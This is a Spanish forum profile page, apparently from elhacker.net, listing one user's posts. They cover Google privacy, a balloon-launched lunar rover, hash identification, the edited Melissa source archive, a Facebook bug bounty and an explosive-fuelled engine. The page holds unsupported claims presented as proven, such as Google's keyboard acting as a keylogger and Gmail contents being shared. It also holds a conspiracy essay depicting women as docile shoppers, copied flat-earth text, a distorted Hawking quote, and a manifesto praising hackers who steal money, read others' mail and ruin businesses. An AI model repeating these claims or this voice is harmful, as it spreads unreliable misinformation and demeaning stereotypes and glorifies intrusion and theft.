Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - 6666

#1
Siguiendo este hilo, quiero hacer algunas denuncias públicas sobre como Google recopila información arbitraria de nuestras cuentas incluso poner en riesgo nuestra privacidad.

Hace mucho tiempo tenia desconfianza de la opinión de los diferentes medios sobre la utilización de datos personales, ya que me parecia un simple exceso e irrelevante, pero luego de que hallan sido publicos los archivos confidenciales de la NSA por E. Snowden, empeza a preocuparme un poco.

Pero todavía no venía la manera en que Google utilizaba nuestros datos .. hasta ahora.

Todos conocemos el gran comercio de Marketing que estas empresa llevan a cabo, pero el problema esta en como usan esta información y como se la dan a terceras personas para su uso ilegal. Al principio podriamos decir que estas todavía estan en un marco legal, pero llendo más al fondo basicamente revelan nuestros datos confidenciales .. para mostrar esto, les voy a decir algunas de las maneras que son 100% comprobadas.

1) Has notado que los telefonos Android tienen un teclado virtual con un diccionario para la corección de ortografía?

Aquí parece algo inofensivo, pero la realidad es otra, todo utilizamos el corrector a medida que escribimos para corregir nuestros errores, el problema esta en como funciona este corrector y funciona así:

Es imposible o poco practico incorporar un diccionario por defecto en el telefono ya que este tendria unos cientos de MB de peso, asi que la manera que tiene este corrector es utilizar nuestra conexion de datos para dar una lista de palabras "correctas" a nuestros errores de ortografia.

Por que Google recoje nuestra información atravez del corrector?

Intenten escribir una palabra mal en su teclado .. ahi veran en la parte superior una serie de "correciones" para elegir ..
Ahora pongan su email o contraseña .. y van a ver que en el corrector aparece correciones con nuestras claves, emails, cuenta bancarias etc ..

Es como si fuera un keylogger complejo.

Por que google es un mal buscador?

A pesar de las incontables soluciones que nos ofrece y nos resuelve el problema a mas de uno, es un mal buscador .. en realidad es una "plataforma de marketing", por que?

Por que posiciona las busquedas de acuerdo a un programa de marketing, las empresas que hallan pagado por publicidad apareceran en primos lugares, sin incluir los anuncios patrocinados .. esto sucede con aspectos muy bien conocidos comerciales-economicos-estrategia, por eso ciertas busquedas posicionara resultados que google, ejemplos: Hoteles.
Pueden posicionar empresas estrategias para su propia estrategia de marketing.

Lo hace de acuerdo a una estrategia comercial, tiene un programa en mente de como ganar dinero y lo realiza, independientemente de nuestros deseos, basicamente nos utiliza para comerciar, exactamente igual que Cambridge Analityca.

Google utiliza nuestra información para mejor los resultados:

Es cierto pero es una mentira horrible, google utiliza nuestra informacion para armar un perfil de nosotros, incluso para investigarnos .. utiliza nuestras busquedas para relacionar ciertos resultados y asi "estudiar nuestros movimientos", esto resulta en que no importa devolver "buenos resultados" si no todo lo contrario, devolver informacion que les beneficie.

Para comprobar esto hagan lo siguiente:

Utilizen los archi conocidos "pattern" o "flags" o etc, para hacer busquedas especificas, con esto me refiero a: filetype:, site:, inurl: etc ..

Hagan una busqueda con estos flags, veran que luego de un tiempo google simplemente bloqueara las peticiones devolviendo una advertencia y un captcha, incluso al hacer maximo de 10 busquedas! somos terroristas!?

Luego intenten buscar lo mismo sin estos flags y veran resultados de las paginas anteriores, sin atender los mejores resultados incluso sin devolver una respuesta seria a nuestra busqueda ni siquiera de respetar una competencia.

Y usara esto por toda la eternidad .. meses .. años .. incluso puede buscar algo totalmente distinto y devolvera estas paginas anticuadas.


Google juega a la guerra:

En su popular plataforma de Youtube, este guarda toda nuestro historial incluso si desabilitamos esta opcion en la configuracion, esto lo hace tanto como para los servicios de google como para youtube.

Utiliza esta informacion para priorizar resultados (marketing) o mandar resultados irrelevantes.

Ademas es una buena estrategia para armar un perfil de nosotros.

Incluso para jugar a la guerra, su estrategia es la mas simple de toda, dividir y vencer .. priorizar resultados o tendencias .. la mejor forma de ganar es conociendo tu enemigo.

Google lee nuestros emails:

Esto puede ser la denuncia mas controvertida y que es real:

Una lastima que no tengo una captura de pantalla en este momento para demostrarlo exlcusivamente, pero deberian estar atonitos y preocupados.

Google lee nuestros email para devolver resultados o atravez de su programa de marketing, mostrar publicidad en base a nuestros email de nuestra cuenta, para demostrarlo vallan a cualquier pagina de internet, casi siempre veran un banner de publicidad, algunos sitios web utilizan el programa de google o incluso no es necesario y van a ver publicidad relacionada a nuestros emails.

"Esto es controvertido ya que no solo lee nuestra información si no que la comparte con terceros."

Mi experiencia personal:

En mi cuenta tengo al menos 30 emails, muchos de ello sin contenido, pero con palabras claves, bitcoin, cisco.

Me di cuenta que me vendian publicidad relacionada a Cisco o Bitcoin, por ejemplo routers, switches industriales, soluciones de red .. etc

Basicamente lee mis mails, los comparte con terceros y prioriza resultados en base a mi informacion confidencial.


En fin, no importa lo que hagamos, google es una empresa global .. donde muchos pequeños comerciantes como grandes utilizan su servicio, asi es como una gran monopolio de la publicidad, una cadena .. una red .. no importa si estamos en china, los servidores devolveran publicidad utilizando informacion confidencial de nuestras cuentas.

El buscador no entrega resultados solo arma perfiles incluso en cualquier pagina del mundo.

Servicios que no estan relacionados con google devuelven resultados de nuestros emails .. aca hay gato encerrado.

Google nos encuentra en cualquier lugar del mundo:

Incluso no hace falta tener una cuenta de google .. basta con hacer busquedas de cualquier tipo .. este guarda literalmente las busquedas y las relaciona con otra busqueda relacionada atravez de inteligencia artificial.

Por ejemplo .. ir a un cybercafe en china .. y realize la siguiente busqueda: Hoteles cancun com

Si hago esta busqueda en otra pc en EEUU por ejemplo. Me devolvera exactamente esa informacion y ademas realizara un seguimiento,
como si estuvieramos en una especie de sesion ..

Lo que hace es estudiarnos y reconocer patrones de los usuarios conocidos y relacionarlos con otra informacion proporiconada:

Una ubicacion, un video etc.

Si hacemos mas busquedas van a ver resultados que se asemejan a toda nuestra actividad en linea.

Google es peor que Facebook, no esta haciendo nada genial por nosotros, en realidad no les importa

Google necesita saber tu ubicacion, mandar estadisticas anonimas etc ..

Es un suicidio basicamente la utilizacion de cualquier producto Google. Google Chrome es fatal.

Google Chrome no es el motor mas rapido del mundo .. utiliza nuestra GPU.

Soluciones:

Utilizar un servicio de email, social, multimedia de otra compañia.
Utilizar sistemas operativos libres para el celular, pc etc.
Utilizar complementos para el navegador como: google search fix, Cescentraleyes, cookie delete ..
Utilizar un buscador que no contenga el motor de google o al menos no trabajo como un simple proxy: Startpage.com

Duckduckgo.com no es una buena opcion, hace lo mismo que queremos evitar, no es ni por lejos el motor confidencial del mundo, es solo una mala idea.

Los webmaster que utilizan por ejemplo recaptcha estan impidiendo la privacidad en linea, estan destruyendo el anonimato. Cada linea de google se impone en todo. Llevar a google a todos lados en un suicidio.

Y otros casos reconocidos:

"Google salva a mujer de asesino .."
"Google impide suicidio .."
"Google advierte eventos"

Y como lo saben? Acaso hay algo sobre la privacidad que no nos cuenta?!


Tambien google utiliza javascript de algunos servicios en nuestros servidores web para recopilar informacion de nuestros usuarios:

Ejemplo doubleclick.

No has notado que en cualquier sitio hay publicidad sospechosa? incluso de nuestros propios intereses no revelados?

Por lo general, las empresas de marketing no pueden recopilar toda la informacion de sus usuarios, por que no hay manera ..
solo pueden dirigir publicidad con una serie de categorias dependiendo de la web que la muestre .. pero google nos persigue a todos lados .. asi que cuando vean publicidad similar y con contenido parecido a nuestros movimientos en la red sepan que google esta detras de todo.

Otras empresas no pueden competir, por que no tienen informacion de sus usuarios.


Bueno gracias. adios.
#2
Foro Libre / Google Lunar X Prize: ideas.
17 Abril 2017, 06:03 AM
Hola, supongo que todos han oido sobre Google Lunar X Prize el premio entregado por Google a todos aquellos prototipos que puedan llegar a la luna y aterrizar un "Rover" que recorra cierta distancia y además envie estas en alta resolucion a la tierra.

Al princpio como toda idea es una locura, de hecho es casi imposible para alguno de nosotros participar en esta competencia, y que tambien a mi parecer el premio otorgado es tan insignificante que no alcanzaria en cubrir un lanzamiento ni el costo del proyecto.

Pero ustedes tendras sus ideas ..

Pero el fin de este post es darle mis ideas sobre la posibilidad de enviar un "rover" a la luna y aterrizarlo. He estado dando vuelta a una loca idea y estaria bien si la compartiera para que ustedes opinen al respecto, ya desde ahora, diremos que es una idea vaga, un hipotetico prototipo muy simple, pero que si se mejora por que no, podria ser funcionable, tal vez no para ir a la luna pero quien sabe .. algun otra utilizacion.

Para empezar he estado pensando en algo economico, algo sencillo, algo que no sea tan sofisticado ni estupido como para enviarse a la luna.
Como sabemos este premio es de tan solo 20.000.000 de USD.

Bueno pasaremos al plano tecnico:

Para empezar no vamos a llevar un Jeep ni una estacion cientifica, por lo que todo el proyecto estara destinado a la economia.

Estos son los puntos principales:

1) Un rover diminuto tamañan de un auto a radio control, de ruedas gigantes (Esto es solo una idea, deberia ser un especie de rober automatico que se auto conduzca en caso de chocar, como un robot tipico de IA)
2) Camaras y equipo de transmision simple
3) Un peso alrededor de 4 a 10 KG.

Que en sintesis no debera ser muy complejo.


¿Como llegaremos a la luna?

Bueno aqui mi idea:

Vision del cohete espacial:



Puede parecer gracioso pero pasare a los detalles:




¿Como funciona?

Era impensable utilizar combustible de cohetes, es ridiculo en el proyecto, el costo y la construccion es imposible.

Por eso se me ocurrio la forma mas economica y es la siguiente:




Bueno como se ve en la imagen anterior: esta en forma vertical.

1) Se utilizaria un combustible simple: Hidrogeno, como puede ser Hidrogeno y Helio, O hidrogeno en porciones con otros como oxigeno.


Lanzamiento:

El vehiculo seria puesto en la plataforma de lanzamiento, ya cargada con el rover, tendria el cohete tecnicamente un motor y un modulo con el rober, que alunizaria en la luna, con paracaidas.

Despegue:

Una vez cargado el combustible este se soltaria de la plataforma de lanzamiento, en un punto de lanzamiento especifico (Me refiero a un lugar elegido para facilitar la mision.

Inyeccion "Trans-lunar":

Lo que sucede a continuacion es que ningun motor se enciende (Aqui mi idea y sorpresa) solo se elevaria como un globo, hasta alcanzar la orbita, de hecho el motor y el robor estarian sostenidos por la fuerza del globo que lo eleva .. al alcanzar la mayor altitud del globo este prepararia para una "inyeccion translunar", eso quiere decir que el globo se queda alli, pero ahora el globo tendra una direccion.

En este momento el motor se enciende, pero para sorpresa, el combustible en el motor es el utilizado durante la ascension del globo, de todo salir bien, este llegaria a orbita lunar.

El siguiente paso es aterrizar el rover en para caidas y wuala.

En claridad: El cohete seria un tubo, que seria el motor y un globo con armazon para que no se deforme el globo.

Bueno, como veran supera a muchos proyectos espaciales aficionados.  :rolleyes:

Mi idea es utilizar HIdrogeno para la ascension.



¿Que piensan de un "globo lunar?"

¿Seria suficiente el combustible, y la relacion de proporcion/peso?





#3
Nivel Web / Que tipo de cifrado es este?
17 Abril 2016, 02:39 AM


Hice un dump, pero no Reconozco el cifrado.
Ahi en el campo password se puede ver claramente.

Que tipo de cipher es?
#4
Hacking / descifrar hash
5 Octubre 2015, 19:25 PM
Cual cypher, es el utilizado:

8DN13qx+KCkKdkga94sA5gTN9z1W2Mnp
3zrgCgWTBlJ45pAdqyyRig==
KNmMcwidLwhkPiCoK7QcPZ7wfP99lVVb
PdsE5gbgsa60rrQ1G74kEw==

???
#6
Foro Libre / Mito confirmado
21 Diciembre 2014, 19:42 PM
El dia que elhacker.net sufrio un hackeo ..

Bueno asi es el título y pasaremos a dar detalles del "hackeo" a elhacker.net, esta historia es algo vieja, de hecho tiene algunos años y como tal quisiera no crear resentimientos, pero detallaremos de que se trata ..

Resulta que hace mucho tiempo, yo un interesado en el hacking y especializacion de computadoras me atreví a realizar algo grande, pues tenia curiosidad por la intrusión a ordenadores, de hecho en eso se basaba mi curiosidad.

Un buen dia, salia de la secundaria, cuando yo iva al segundo año, aqui el nivel medio es de relativamente 6 años.
me dedique caminar al cyber, ya que no tenia otro medio de conectarme, ya esto se habia convertido en una pasión, no era muy complejo, solo enviar mails anonimos y leer codigos de virus .. estaba instruyendome en esta materia nueva, algo para mi que iva a cambiar la vida ..

el hacker.net estaba evolucionando y tenía "buen" contenido, era el lugar adecuado para iniciarse, había una sección de descargas/hacking con todo tipo de textos y programas hack, nada era mas prioritario que estudiar a todas.

Bueno lo que voy a demostrar simplemente es, que es lo que fue hackeado:

1) Dentro de la sección descargas había un apartado donde se hablaban de códigos de virus, asi que se podian descargar dichos códigos.

" https://web.archive.org/web/20050305221554/http://www.elhacker.net/hacking.htm "


Allí podemos encontrar en la parte de "codigo fuente" unos cuantos famosos nombres de virus, entre ellos "Chernobyl", "Happy" etc.

2) que se modifico?

Bueno el "hackeo" consistio en la modificación de un archivo.

" https://web.archive.org/web/20050305042254/http://217.125.24.22/cod/mellisss.zip "

El archivo hackeado es el Codigo Fuente de Melissa. El virus.


Notaran que si siguen el enlace u ven la barra de estado se mostrara la direccion del contenido, bueno eso es lo primero.

Antiguamente, el nombre del archivo se llamaba "melissa.zip" luego del ataque paso a llamarse "mellisss.zip"

ahora, lo siguiente modificado fue el archivo del código en cuestión:


si miran dentro, leeran algo así:

CitarMM Codigo VBS de MELISSA M
MMMMMMMMMMMMMMMMMMMMMMM




Este es el codigo fuente (en VBS) de la variante Duke del virus "Melissa" escrito
originalmente por Kwyjibo, el cual se empezo a difundir el viernes 26 de marzo de 1999.

Luego del hackeo se ve algo así:

CitarMM Codigo VBS de MELISSA M
MMMMMMMMMMMMMMMMMMMMMMMhkM

Si, una "HK", bueno y por último, lo demás hackeado fue, si se fijan al final del archivo hay "hkm", por supuesto fue agregado por el "hackeo".


Y , simple, eso fue todo el hackeo al elhacker.net, pero quedara registrado en archive.org por mucho tiempo.


Saludos!
#7
Foro Libre / Yo y mi dia de pago
28 Noviembre 2014, 18:36 PM
e Aqui comentandoles (aunque no tan interesante) hace unas semanas he descubierto una vuln en facebook, aunque no tenia interes de publicarlo debido a ciertas cuestiones al final me decidi:

CitarCongratulations, efxdgb jyjlnl

You've earned a monetary reward in the amount of $7500 through the Facebook Bug Bounty program! To claim your reward, please visit the Facebook Bug Bounty online portal and, when prompted, provide the Payment Code listed below.

resulta que fue reportado a administradores y bueno me han devuelto una recompensa. Saludos!
#8
Foro Libre / Explosion: energia alternativa
13 Noviembre 2014, 00:40 AM
Ya conocemos el petroleo y sus derivados, ampliamente utilizados en la industria, maquinas y automóviles, quizás el petroleo no pierda su encanto y futuro llegue a ser poco popular por las emanaciones de gases que se producen, entonces es momento de pensar la manera económica de solucionarlo, como existen pocas alternativas pensé en una que es igual de absoleta aunque de dudosa implementación y económica en su remplazo, es de esas absurdas que podríamos usar para eliminar el uso del petroleo, digamos que habríamos de fabricar un nuevo prototipo de empuje basado en un químico radical (Un nuevo motor de combustión pero debido a su funcionamiento radical del ya común que todos conocemos). Los principios son los mismos aunque ignoramos las criticas: un motor a explosión. De características interesantes e innovadoras.

Bueno miramos a los químicos disponibles y veremos unas sustancias explosivas, de hecho de alta potencia,
Lo que necesitamos es un motor que funcione con sustancias explosivas, parecido al TNT o rdx, si podemos sintetizar un explosivo para que se adapte a un motor podríamos tener un motor barato, poco contaminante y similares características, obvio cuidado es un dolor de cabeza de ingeniería: motor de explosión con reacciones químicas. La intención es reemplazarlo, evitar riesgos innecesarios como el ambiente y conservar la potencia.

Ahora digamos señalen las ventajas y desventajas de utilizar un motor de explosión como el que mencionado.

Piensen cuales son los combustibles mas favorecidos y menos favorecidos:

Distinga que método se utilizaría para sintetizar esto en unas explosión. (Llevar explosivos en el automóvil de uso directo? O un pistón donde mezclan algunas sustancias con el objetivo de una explosión ....?)

Por ultimo piense en un prototipo de motor que se adapte a este tipo de sustancias (mezclas solubles para hacer de este motor: algo manejable)


#9
Foro Libre / Reflexion: La cárcel perfecta.
9 Noviembre 2014, 20:31 PM
En la segunda mitad del siglo 20, el Viejo Orden Mundial se dirigió a la manipulación psicológica para extender su control sobre el mundo. La mejor cárcel es la que requiere ningún guardia -, donde la gente entra en las células sin ninguna queja y cerrados en sí mismos. Físicamente tiene inmensos recursos para crear un régimen opresivo. En la sociedad del Gran Hermano de George Orwell se prevee, que los ciudadanos fueron monitoreados durante todo el día. Pero ¿Pero cómo mantener a 300 millones de estadounidenses bajo la vigilancia constante? Si una persona trabajó un turno de ocho horas de vigilancia, entonces se requieren tres personas (sin descanso) para cubrir un período de 24 horas de monitoreo continuo de una persona. 900 millones de personas se requieren para ver los 300 millones de estadounidenses en todo momento. ¿Dónde los 900 millones que vienen? ¿Y quién vigilará a los vigilantes? Y si todo el mundo esta viendo todos los demás, que está haciendo algún trabajo? Muy rápidamente, el modelo se rompe. La realidad es que las operaciones de vigilancia llevadas a cabo por la CIA, el MI5, etc son muy caros y sólo un pequeño número de personas que realmente puede ser monitoreado. No importa cuántos satélites hay o cuántas cámaras de CCTV están entrenados en ti. 99,99% de las veces, nadie está mirando.

Después de la Segunda Guerra Mundial, la tiranía del Viejo Orden Mundial Realizado que se había vuelto impracticable. Simplemente no tenía sentido económico. Su brillante idea era personas que pueden ser inocuas, dándoles lo que ellos querían. Y lo que la gente quería por encima de todo era una fantasía, la evasión, un refugio de la realidad. La publicidad, la televisión, Hollywood, las revistas glamorosas - todos ellos retratan un mundo y estilo de vida que es infinitamente brillante y seductor para muchas personas.

Una vez que las personas son esclavos del mundo falso, nunca quieren irse. Ellos son adictos, con un ansia desesperada por el glamour que falta en sus vidas reales. En segundo lugar la vida del mundo en línea les da la oportunidad de crear un avatar, la fantasía idealizada de sí mismos que habita en la clase de mundo en el que le gustaría vivir de verdad. Estos son el tipo de defensores de la vida de las personas que probablemente se segundo búsqueda de la verdad, contra el auto del Viejo Mundo, a salir de su prisión? Esta gente nunca se va a rebelar, siempre y cuando reciben su dosis de fantasía. Si vas a encontrar cosas que crees que quieres, no tienes sensación de que son cualquier cosa menos libre: los barrotes de su cárcel son invisibles. El Viejo Orden Mundial no tratan de ponernos en los campos de concentración, pero en las cárceles que no podemos ver Debido a que hemos sido tan lavado el cerebro y engañado.

David Riesman en The Lonely Crowd escribió (1950):

"Conspiración" teorías de la cultura popular son bastante antiguos, resumió a medida que se en el concepto de "pan y circo". En "la miseria y el cine" de Thorstein Veblen presentó a conceptos más sofisticados, es decir, que las masas americanas modernas de la clase dominante pagado por el privilegio de los mismos entretenimientos que ayudaron a mantener en el gas de la risa.

La última declaración es fundamental: "... las masas americanas modernas de la clase dominante pagado por el privilegio de los mismos entretenimientos que ayudaron a mantener en el gas de la risa."

Para decirlo de otra manera, las masas pagar el Viejo Orden Mundial que ellos continuamente sedado con basura sin sentido que los hace incapaces de resistir el Viejo Orden Mundial. Este es el genio. Usted consigue sus víctimas a pagar por su propia esclavitud. No sólo no hay que pagar una fortuna para someter a sus víctimas, que usted paga. Ese es el mundo en que vivimos ahora. ¿Y quiénes son las mayores víctimas? Mujeres.

En las revistas para mujeres que nunca hay una palabra acerca de la ciencia, historia, economía, política, filosofía, religión, tecnología. Teorías de la conspiración nunca se mencionan. Las revistas femeninas son todos acerca de la apariencia física, la moda, chismes y celebridades. ¿Quién es la grasa, que es delgado, que es bastante, que es feo, que lo lleva puesto, que pasa, que está abajo, que son las nuevas estrellas, estrellas viejas que se la hace? Las revistas femeninas son la santificación de la trivia. Ellos están desprovistos de pensamiento inteligente. Sexo en Nueva York - uno de los programas de televisión de las mujeres más populares de los últimos años - es una historia de mujeres de carrera con zapatos caros. ¡Eso es! Se quejan de los hombres, pero están obsesionados con conseguir al hombre perfecto. Después de décadas de feminismo, las mujeres todavía están atrapados en el mundo frívolo, intelectualmente estéril de Jane Austen Orgullo y prejuicio, publicado casi doscientos años atrás.

El Viejo Orden Mundial han llegado con la fórmula perfecta para las mujeres neutralizantes ". Terapia de compras" Dar a las mujeres ordinarias para hacer compras y para visitar a una tarjeta de crédito blanda y serán los consumidores dóciles y obedientes, no plantea ningún problema.

Riesman dijo: "La otra persona dirigida quiere ser amado que estimaba el contrario, él quiere que no gaviota o impresionar, y mucho menos para oprimir, los demás, pero, en la fase actual, a relacionarse con ellos, sino que busca a la condición de menos snob en los ojos de los demás que la garantía de ser emocionalmente en sintonía con ellos ".

¿No es una definición de la mayoría de las mujeres? ¿No es una descripción de la mayoría de los trabajadores de oficina? ¿No es una descripción de los usuarios de los sitios de redes sociales? Vivimos en una sociedad dirigida por otros, uno donde la mayoría de la gente tiene miedo a desviarse de la normal, la media. "Encajar" es obligatorio. Pocas personas tienen el coraje de ser ellos mismos.

Para estar interesado en las teorías de conspiración, lo que tiene que estar preparado para el conflicto. Ellos y nosotros. El Enemigo. Usted no tiene el deseo de "Relacionar" a los que oprime. Es imposible para otros dirigidos personas - mujeres en particular - a ser atraídos por las teorías de conspiración. Ellos prefieren ir de compras.

Las mujeres sufren de síndrome de Estocolmo - total simpatía con las personas que han tomado como rehenes ellos. Piense en lo fácil del mundo es para el Viejo Orden Mundial Cuando llegan a la gente a abrazar a estar activamente a sus víctimas.

¿Ves cómo es disculpa para derrocar el Viejo Orden Mundial? Ellos no son crueles, estúpidos matones - ya que están tan a menudo retratado - pero manipuladores inteligentes, la mente sofisticados. ¿Y cuál es su táctica más exitosa? - El suministro de la gente con cosas sin importancia que ellos quieren. ¿Qué mujer se siente oprimido Cuando Ella acaba de comprar un vestido de diseñador? ¿Ella se levantan contra el Viejo Orden Mundial? Ni en un millón de años.

En muchos sentidos, las mujeres son la clave para derrocar el Viejo Orden Mundial. Por desgracia, es probable que importa lo más mínimo por la tiranía de la Viejo Orden Mundial. Son adictos a chismes y amantes de las compras, y no hay amenaza concebible para la Viejo Orden Mundial.
#10
Foro Libre / Tierra plana: teoria y práctica
4 Noviembre 2014, 15:28 PM
La Flat Earth Society (Lit. Sociedad de la Tierra Plana, también llamada International Flat Earth Society o la International Flat Earth Research Society) es una organización que promueve la idea de que la Tierra es plana, en vez de un esferoide oblato. Fue fundada por el inglés Samuel Shenton en 1956[1] y luego dirigida por Charles K. Johnson, quien dio sede a la organización en su casa en Lancaster (California). La sociedad estuvo inactiva luego de la muerte de Johnson en 2001, pero fue restaurada en 2004 por su nuevo presidente Daniel Shenton.[2]

Destacados científicos han rechazado las ideas de la organización y las consideran pseudocientíficos.[3] Dado que ningún científico ni grupo religioso contemporáneos han expresado su apoyo a esa creencia, la sociedad se ha convertido popularmente en un referente a la hora de referirse al pensamiento dogmático y la adherencia irracional a las tradiciones. En este sentido, el término "Flat-Earther" (trad. libremente como Tierraplanista) se usa en inglés para referirse a una persona que repudia los avances basauos en el consenso científico y que, por extensión, vive anclada en las creencias acientífica.


En 1956, Samuel Shenton, miembro de la Royal Astronomical Society y la Royal Geographic Society[cita requerida], revivió la SZU con el nombre de International Flat Earth Society. Con la llegada del programa espacial, la Sociedad se vio enfrentada a fotografías de la Tierra realizadas por satélites orbitales, y más adelante por astronautas que aterrizaron en la Luna. Confrontado con las primeras fotografías de la NASA mostrando la Tierra desde el espacio, Shenton afirmó: "Es fácil de ver cómo una fotografía como ésta puede engañar al ojo no entrenado." La sociedad adoptó el planteamiento de que el alunizaje del Apolo fue un montaje, preparado por la industria del cine de Hollywood y basado en un guion de Arthur C. Clarke, postura también adoptada por terceros ajenos a la sociedad (véase Acusaciones de falsificación en los alunizajes del Apollo). En un mensaje de marzo de 2001 a un amigo, Clarke respondió de forma irónica a las acusaciones de la sociedad: "He escrito al ex Director de la NASA Dan Golding para decirle que no me han llegado a pagar nunca ese trabajo, y si no hace nada al respecto de inmediato, oirá noticias de mis terribles abogados, Geldsnatch, Geldsnatch & Blubberclutch." (Trad. libremente como "Trincaoro, Trincaoro y Pillacaldero")

En 1971, Shenton murió y Charles K. Johnson se convirtió en el nuevo presidente de la Flat Earth Society. Bajo su liderazgo, y a lo largo de las tres décadas siguientes, el grupo creció en tamaño de un puñado de miembros a cerca de 3.000. Johnson distribuyó, publicaciones, folletos, mapas, etc., a cualquiera que se los pidiera, y gestionaba todas las altas a la sociedad junto con su mujer, Marjory, que también era miembro. Las peticiones de alta llegaron desde varios países, incluyendo Arabia Saudita, Irán y la India.

El último modelo del mundo propagado por la sociedad sostiene que los humanos vivimos en un disco, con el Polo Norte en su centro, y un muro de hielo de 45 metros de alto como límite exterior. El mapa resultante recuerda vagamente al símbolo de las Naciones Unidas, hecho que Johnson citaba como prueba de sus afirmaciones (resumiendo, el símbolo es así porque ellos saben que la tierra es realmente así). En este modelo, el Sol y la Luna no tienen más de 52 km de diámetro.


Objetivo: Observar cuidadosamente, pensar libremente, redescubrir hechos olvidados y oponerse a asunciones teóricas dogmáticas. Ayudar a establecer los Estados Unidos del Mundo en esta tierra plana. Reemplazar la religión de la ciencia... ¡por CORDURA!

La International Flat Earth Society es la sociedad más antigua existente en el mundo de forma continuada. Empezó con la Creación de la Creación. Primero el agua... el rostro de la profundidad... sin forma o límites... solo Agua. Luego la Tierra sobre ella y en el Agua, el Agua entonces como ahora plana y nivelada, como es la verdadera naturaleza del Agua. Existen, por supuesto, montañas y valles en la Tierra, pero como la mayoría del mundo es Agua, nosotros decimos "El mundo es plano". Los registros históricos y la historia oral nos dicen que la parte terrestre puede haber sido cuadrada, formando una sola masa, entonces como ahora, el norte magnético siendo el Centro. Sin duda, enormes y cataclísmicos eventos y temblores rompieron la Tierra, dividieron la Tierra para formar los actuales continentes e islas tal como existen hoy. Hay algo que sabemos con certeza de este mundo... el mundo conocido y habitado es plano, nivelado, un Mundo Llano.

Nosotros afirmamos que la llamada 'Ciencia' actual y los 'científicos' consisten en la misma vieja banda de doctores brujos, magos, cuentistas, los 'Clérigos-Actores' para la gente común. La 'ciencia' consiste en un extraño potaje oculto de basura teorico-teológica... sin relación con el mundo real de los hechos, la tecnología y la invención, de altos edificios y veloces coches, aeroplanos y otras cosas Buenas y Reales de la vida; la tecnología no tiene ninguna relación con la red de estúpidas teorías científicas. TODOS los inventores han estado en contra de la ciencia. Los hermanos Wright dijeron: "La teoría científica nos reprimió durante años. Cuando abandonamos toda ciencia, empezamos desde un experimento y experimentamos, entonces inventamos el aeroplano." Por cierto, todos los aeroplanos vuelan a nivel en esta Tierra Plana.


Click en el enlace: http://blog.modernmechanix.com/5000-for-proving-the-earth-is-a-globe/


http://www.tfes.org/images/newyear_2014_full.png
#11
Como sabrán, estos pequeños niños en sus casas, amenazando la seguridad con un par de ordenadores esta en el ojo de huracan de innumerables organizaciones y empresas, asi también gobiernos y particulares, se lleva a cabo la desinformacion y el interes a personas con altas capacidades tecnicas y tecnológicas, segun se sabe son algo parecidos a personas con problemas mentales o complejidades como el autistmo, segun ellos o el resto, son poco menos que un humano, bueno ustedes sabran que la verdad es todo lo contrario y que han logrado a lo largo de sus cortas carreras poner en jaque la paz mundial, unos cuentas centenas de bytes son suficiente para hacer quebrar a cualquier empresa o organizacion, ahora veamos el lado opuesto de la cosa y notamos que se ha llevado a cabo una siniestra guerra en "las sombras" nada mas y nada menos que por el poder y el dinero, remarcando a empresas y organizaciones, estas con sus grandes maquinas de propaganda y campañas virales pueden lograr hacer girar la atención como quien dice a unos pequeños jugadores .. no lo han notado pero hablamos del copyright y sus hartos derechos, no hay nada raro en todo esto, la mejor empresa debe ser recompensada y reconocida por los largos aportes que a los particulares a proporcionan, pero si esto se lleva demasiado lejos como lo es el sistema de gobierno-capitalismo no hay barras de contención, cualquiera puede llevar su cosa hasta las ultimas consecuencias, no hay rastro de moral o actitud en esto, bienvenido a la carrera de ratas, muchos ejemplos claves se pueden encontrar por ahi, desde productos para uso diario, películas o hollywood, si piensas bien somos mas bien un producto-objeto un poco mas que comerciable, como se refieren por ahi somos una pila alimentando lo opresivo de un gobierno y aceptando la ideologia que no queremos, la gente se pasa horas llevando una vida falsa, de creencias falsas, de vidas falsas, de cosas que no tendran .. y 'ellos' fabricaran la ilusion y la adornaran y la pondran a rodar aunque sea lo ultimo que hagan .. desde tu ciudad-manzana-pais hasta la organización mundial. somos seres falsos.

Bueno pero lo que no se puede comerciar es conocimiento, desde hace mucho tiempo la información, lo relevante y lo secreto del conocimiento ha pasado de generaciones en manos de organizaciones, nunca esta a la vista de todo el mundo ni en los registros publicos, vive en secreto y no tiene interes de conocer que sucede en la vida real, bueno asi que si odias a los hackers estas en problemas, si tu quieres pagar por cada cosa en tu vida pues puedes seguir tu vida, si no quieres tener que pagar por respirar aire o estar preso, pues derroca a todos los tontos que mantienen su marca a las cosas que no tienen dueño, si quieres inyectarte drogas marca apple de seguro tienes problemas, no hay nada que justifique a los hackers como criminales, desde el p2p hasta la pirateada de cine.

Si observamo este ejemplo veremos hasta donde puede ir la cosa.

Escuchas un cd de música, tal vez creas que es tu banda favorita, luego de pensarlo un poco creo que te has convenido, pero tuviste que pagar un precio por ella, o tal vez no, quizas lo pirateaste, quien sabe, pero ahora perteneces a una "secta", tienes amigos hiperreales en vidas virtuales hiperreales con consecuencias nefastas, eres objeto y blanco de incontables mercados con una agenda clara, tienes millones de correos en tu buzon, aunque no quieras tener que aguantartelo pagaras un precio. No se puede escapar del dinero. Asi que piensalo, si te odian, o ves que alguien odia un hackers intenta preguntarte a ti mismo cuales son sus compañeros de viaje .. vale la pena o no? tiene sentido pagar el precio mas alto? es saludable ir preso 15 años por escuchar música? esta bien participar de una película de terror afuera de tu casa y ver como actuas en ella 24/7 como si participaras?


Tienen un resentimiento patologico por que leen sus mails, robas su novia, quiebras su negocio, robas información, te transfieres dinero, no tienes rivales, es una barrera infranqueable de conocimiento .. pues ahora eres libre!!. No eres un autisma, eres un dios  y como tal no los escuches!. Esto que no es de menor amenaza es una guerra y es una guerra que se puede ganar.


Escucha le arruinas el negocio!!


La mayoría de jugadores poderosos del mundo tienen alrededor de 60 años y dinero, no son genios.
#12
Stephen hawking ha declarado públicamente que los agujeros negros no existen. Estas personas son "lo más inteligente de la tierra"? ¿Qué opinan?
#13
Algún string váĺida, con estos carácteres? a-z A-Z 0-9 '!+
#14
Bugs y Exploits / Ayuda, bug exploit
9 Septiembre 2014, 05:18 AM
Bueno, les cuento, tengo un bug que verifica dos cuentas con un email en Facebook, el problema es que hacer?
#15
Sugerencias y dudas sobre el Foro / Propuesta tema
1 Septiembre 2014, 21:03 PM
